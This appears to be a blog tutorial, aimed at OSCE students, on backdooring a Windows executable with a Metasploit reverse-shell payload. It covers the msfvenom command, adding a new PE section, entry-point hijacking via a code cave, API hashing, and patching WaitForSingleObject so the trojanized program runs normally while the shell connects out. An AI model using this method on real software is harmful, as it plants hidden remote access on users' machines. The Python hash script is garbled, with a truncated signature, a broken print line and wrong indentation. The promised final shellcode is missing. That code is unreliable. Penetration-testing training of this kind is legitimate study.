Looking for WaitForSingleObject Call in Modern Metasploit Shellcode

May 2017

This article describes the process of locating WaitForSingleObject function. If you are doing OSCE, you might have stumbled upon this function when using a shellcode generated by msfvenom.

Step 1: Generating payload

First, we need to generate a shellcode using msfvenom. We need to use EXITFUNC=none so that our program keeps running after the completion of the shellcode.

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=none -f hex
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of hex file: 648 bytes

I spent a couple of hours trying to figure out why windows/exec payload does not work. The answer is that it is generating a payload like shellcode + cmd_string, and when shellcode returns from the function, it gets right into cmd_string.

Step 2: Preparing executable

Create a new section, so that it has the following attributes: .NewSec, VOffset: 0x46000, VSize: 0x1000, ROffset: 0x2D000, RSize: 0x1000, Flags: 0xE000000E0.

If you are doing CTP/OSCE, you are familiar with overwriting the first bytes of a program. These bytes are called Original Entry Point. You could do that here. Alternatively, you can overwrite AddressOfEntryPoint in the PE header.

Then you create a code cave like this:

  1. pushad
  2. pushfd
  3. msfvenom generated payload
  4. stack alignment via sub esp, ... or add esp, ...
  5. popfd
  6. popad
  7. return to the original flaw (depends on the way you hijacked the original flaw)

Step 3: Understanding Metasploit shellcode

We do not need to reverse the whole shellcode. The git repository of Metasploit has assembly source code for all payloads.

A file block_api.asm defines a function to look up API functions. msfvenom generated shellcode looks up API functions by their hashes, not names or addresses. Thus, it does not have any direct pointers, which makes it difficult to reverse engineer.

The following Python code calculates a function hash:

# -*- coding: utf-8 -*-

def ror(dword, bits):
    return (dword >> bits | dword << 32 - bits) & 0xFFFFFFFF

def unicode(string, uppercase=True):
    result = ''
    if uppercase:
        string = string.upper()
        for c in string:
            result += c + '\x00'
        return result

def hash(
    module_hash = 0
    function_hash = 0
    for c in unicode(module + '\x00'):
        module_hash = ror(module_hash, bits)
        module_hash += ord(c)
        for c in str(function + '\x00'):
            function_hash = ror(function_hash, bits)
            function_hash += ord(c)
            h = module_hash + function_hash & 0xFFFFFFFF
            if print_hash:
                print '[+] 0x%08X = %s!%s' % (h, module.lower(),
            return h

if __name__ == '__main__':
    hash('kernel32.dll', 'WaitForSingleObject')

When we run it, it will display the hash of the WaitForSingleObject function in the kernel32.dll module.

python hash.py
[+] 0x601D8708 = kernel32.dll!WaitForSingleObject

The hash is 0x601D8708.

Then, to get a reverse shell, we use code from block_reverse_tcp.asm. This code looks up required API functions (those push; call ebp; instructions) by their hashes, calls them, and then returns a socket through edi register. Calling connect, for example, is made like this:

push byte 16        ; length of the sockaddr struct
push esi            ; pointer to the sockaddr struct
push edi            ; the socket
push 0x6174A599     ; hash( "ws2_32.dll", "connect" )
call ebp            ; connect( s, &sockaddr, 16 );

After that, the shellcode spawns a shell, using block_shell.asm. This code uses CreateProcessA , and it uses our socket as stdin, stdout, and stderr.

In block_exitfunk.asm an exit function get called (the one, specified via EXITFUNC parameter).

Step 4: Fixing shellcode

If we look close to block_shell.asm code, we’ll see it uses the WaitForSingleObject function. This snippet shows where it is used:

dec esi             ; decrement ESI down to -1 (INFINITE)
push esi            ; push INFINITE inorder to wait forever
inc esi             ; increment ESI back to zero
push dword [eax]    ; push the handle from our PROCESS_INFORMATION.hProcess
push 0x601D8708     ; hash( "kernel32.dll", "WaitForSingleObject" )
call ebp            ; WaitForSingleObject( pi.hProcess, INFINITE );

We see this code uses INFINITE as a value for the dwMilliseconds parameter. The prototype of the WaitForSingleObject function is:

DWORD WINAPI WaitForSingleObject( _In_ HANDLE hHandle, _In_ DWORD dwMilliseconds);

To avoid glitching, we must set the value of the dwMilliseconds to zero. We can do that by changing dec esi to nop.

Now our shellcode should look like this:

Copy changes to the executable, save it, and run it. Everything should work fine.